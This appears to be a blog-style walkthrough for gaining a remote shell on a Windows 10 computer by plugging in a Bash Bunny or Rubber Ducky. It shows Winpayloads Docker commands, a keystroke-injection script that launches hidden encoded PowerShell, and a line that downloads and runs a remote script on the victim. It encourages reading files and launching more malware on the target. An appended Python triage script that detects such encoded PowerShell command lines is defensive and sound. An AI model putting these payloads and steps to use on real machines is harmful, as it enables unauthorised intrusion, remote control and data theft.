🐇 Hacking a Windows 10 Computer with the Bash Bunny or Rubber Ducky 🐤
This guide will show you the simplest way to get a remote shell connection on a Windows 10 target just by plugging in the Bash Bunny. This connection will give you command line control over the computer from a remote location, which I’d constitute as “hacking” a Windows computer.
This works equally well, and probably better, with a Rubber Ducky (because it works faster), but I don’t own a Rubber Ducky; the Bash Bunny is just what I had on hand. Most of the guide should work the same if you’re using a Rubber Ducky, though, since they both simulate a keyboard.
What you’ll need:
Number 3 is a lie. We’ll be using Winpayloads to generate PowerShell payloads and control our shell, all from one program. It’s a script kiddie’s dream! It takes just two commands to start running Winpayloads once you have a Virtual Private Server set up.
Undetectable Windows Payload Generation with extras Running on Python2.7 Normal installation is deprecated, Please use…
You could use any computer you own, but using a VPS service simplifies things. I recommend using DigitalOcean, but any VPS service that can launch a Linux instance will work. There are plenty of guides out there on how to use DigitalOcean. Debian or Ubuntu will work great. Using my referral link like the one below will help support the upkeep of my own servers!
DigitalOcean - The developer cloud
Then of course you need the hardware. Here’s a link to Hak5:
Top Pentest Devices
Command and Control
SSH into your Linux VPS and run these two commands (make sure to update, upgrade and install Docker first):
docker pull charliedean07/winpayloads:latest
docker run -e LANG=C.UTF-8 --net=host -it charliedean07/winpayloads
Then you should have Winpayloads launched and you’ll see this:
Type stager, then type r to select a reverse shell payload:
That PowerShell string will be the heart of your Bash Bunny / Rubber Ducky payload. Plug in your device, navigate to where the payloads are to be placed, and put in the following code:
Q GUI r
Q DELAY 500
Q STRING powershell
Q DELAY 250
Q DELAY 2000
Q STRING powershell.exe -w hidden -noni -enc [YOUR PAYLOAD HERE]
Q DELAY 500
Your payload will be different each time you generate it with Winpayloads. After the -noni -enc part is where the base64 string starts that contains your reverse shell payload. Copy the base64 part and paste it over where it says [YOUR PAYLOAD HERE] like so:
Save the file and dismount your device; it’s now ready for attack.
Locate your Windows 10 target.
Plug in your device.
The payload will take ~10 seconds to initiate if you’re using a Bash Bunny.
You should receive a connection back on your command and control server from whatever IP address your victim is connecting to the internet from.
1 to begin controlling the Windows computer.
You can run any commands on your target, read files, launch more malware, or do some harmless fun like rick roll them with this command (don’t run strange scripts on computers or networks you care about):
iex (New-Object Net.WebClient).DownloadString("http://bit.ly/e0Mw9w")
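The command line typed by the device above (powershell.exe -w hidden -noni -enc ...) is also what a defender sees in process-creation logs. The following is an added example, not part of the original guide or of Winpayloads: a triage check that flags that flag combination, including abbreviated parameter names, and decodes the base64 (UTF-16LE) argument for review. It assumes command-line logging is enabled (for example Sysmon Event ID 1 or Security 4688); the function names and sample lines are constructed for illustration.

```python
import base64
import re

PS_IMAGE = re.compile(r"(^|[\\/])(powershell|pwsh)(\.exe)?$", re.I)

def is_param(token, full, min_len, aliases=()):
    """True if token is a PowerShell-style abbreviation of parameter `full`."""
    if token[:1] not in ("-", "/"):
        return False
    name = token[1:].lower()
    return name in aliases or (len(name) >= min_len and full.startswith(name))

def analyze(cmdline):
    """Return triage details for a PowerShell command line, or None if not PowerShell."""
    tokens = cmdline.split()
    if not tokens or not PS_IMAGE.search(tokens[0].strip('"')):
        return None
    result = {"hidden": False, "noninteractive": False, "encoded": False, "decoded": None}
    for tok, nxt in zip(tokens[1:], tokens[2:] + [""]):
        if is_param(tok, "windowstyle", 1) and nxt.lower() == "hidden":
            result["hidden"] = True
        elif is_param(tok, "noninteractive", 4):
            result["noninteractive"] = True
        elif is_param(tok, "encodedcommand", 1, aliases=("ec",)):
            result["encoded"] = True
            try:  # -EncodedCommand carries base64 of UTF-16LE text
                result["decoded"] = base64.b64decode(nxt, validate=True).decode("utf-16-le")
            except ValueError:
                pass  # malformed blob: still flagged, just not decoded
    # Alert on an encoded command that also hides its window or refuses prompts.
    result["alert"] = result["encoded"] and (result["hidden"] or result["noninteractive"])
    return result

def _enc(script):  # helper used only to build the constructed samples below
    return base64.b64encode(script.encode("utf-16-le")).decode()

# Constructed sample command lines, shaped like Sysmon Event ID 1 / Security 4688 data.
SAMPLES = [
    "powershell.exe -w hidden -noni -enc " + _enc("Write-Output 'constructed sample'"),
    r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1",
    "PowerShell -WindowStyle Hidden -NonInteractive -EncodedCommand " + _enc("Get-Date"),
    r"notepad.exe C:\notes.txt",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(analyze(line), "<-", line[:60])
```

The check only recognises the window style value when it is spelled out as hidden, and it works on the logged command line alone, so pair it with PowerShell script block logging to see what the decoded command goes on to execute.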